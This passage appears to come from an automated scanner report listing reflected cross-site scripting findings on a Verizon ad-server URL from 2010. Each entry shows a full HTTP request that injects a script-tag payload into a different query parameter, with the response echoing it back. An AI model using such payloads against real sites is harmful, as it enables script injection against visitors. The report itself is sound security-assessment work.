var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
edia/ads/click_lx.ads/vzsurround2.net/homepage/L24/43082758/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=ce5c6"><script>alert(1)</script>4b709a88f58&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_b
...[SNIP]...

2.512. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the popip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b66a"><script>alert(1)</script>be6469a3dd8 was submitted in the popip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.2185b66a"><script>alert(1)</script>be6469a3dd8&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:27:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ne.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/L24/1426707443/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.2185b66a"><script>alert(1)</script>be6469a3dd8&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=
...[SNIP]...

2.513. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popservice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the popservice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33fac"><script>alert(1)</script>a20038b07f6 was submitted in the popservice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=33fac"><script>alert(1)</script>a20038b07f6&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:27:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
p/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=33fac"><script>alert(1)</script>a20038b07f6&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&
...[SNIP]...

2.514. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popstate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the popstate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feef0"><script>alert(1)</script>77908454476 was submitted in the popstate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=feef0"><script>alert(1)</script>77908454476&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:27:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
/vzsurround2.net/homepage/L24/1581065690/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=feef0"><script>alert(1)</script>77908454476&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&
...[SNIP]...

2.515. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popzipcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the popzipcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a20e9"><script>alert(1)</script>cfe275c5855 was submitted in the popzipcode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=a20e9"><script>alert(1)</script>cfe275c5855&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:27:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
.net/homepage/L24/1375367240/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=a20e9"><script>alert(1)</script>cfe275c5855&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail
...[SNIP]...

2.516. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [prizm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the prizm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1103"><script>alert(1)</script>1f492ad7e8f was submitted in the prizm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=c1103"><script>alert(1)</script>1f492ad7e8f&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
A_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=c1103"><script>alert(1)</script>1f492ad7e8f&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&we
...[SNIP]...

2.517. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [pts parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the pts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7ab0"><script>alert(1)</script>06e5b541ba9 was submitted in the pts parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=a7ab0"><script>alert(1)</script>06e5b541ba9&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1392
Content-Type: text/html
Cache-Control: private
Content-Length: 1392

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ndicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=a7ab0"><script>alert(1)</script>06e5b541ba9&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.518. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [pws parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the pws request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccffd"><script>alert(1)</script>a2852340bf0 was submitted in the pws parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=ccffd"><script>alert(1)</script>a2852340bf0&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=ccffd"><script>alert(1)</script>a2852340bf0&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.519. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 872c8"><script>alert(1)</script>1b45bbf22d3 was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=872c8"><script>alert(1)</script>1b45bbf22d3 HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:29:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
artner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=872c8"><script>alert(1)</script>1b45bbf22d3" target="_top">
...[SNIP]...

2.520. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [sec_email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the sec_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9252"><script>alert(1)</script>436d38cb11a was submitted in the sec_email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=e9252"><script>alert(1)</script>436d38cb11a&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=e9252"><script>alert(1)</script>436d38cb11a&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.521. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [smb_enh_msg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the smb_enh_msg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2ccf"><script>alert(1)</script>8157b718fa1 was submitted in the smb_enh_msg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=e2ccf"><script>alert(1)</script>8157b718fa1&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:29:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
zm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=e2ccf"><script>alert(1)</script>8157b718fa1&webex=&search=" target="_top">
...[SNIP]...

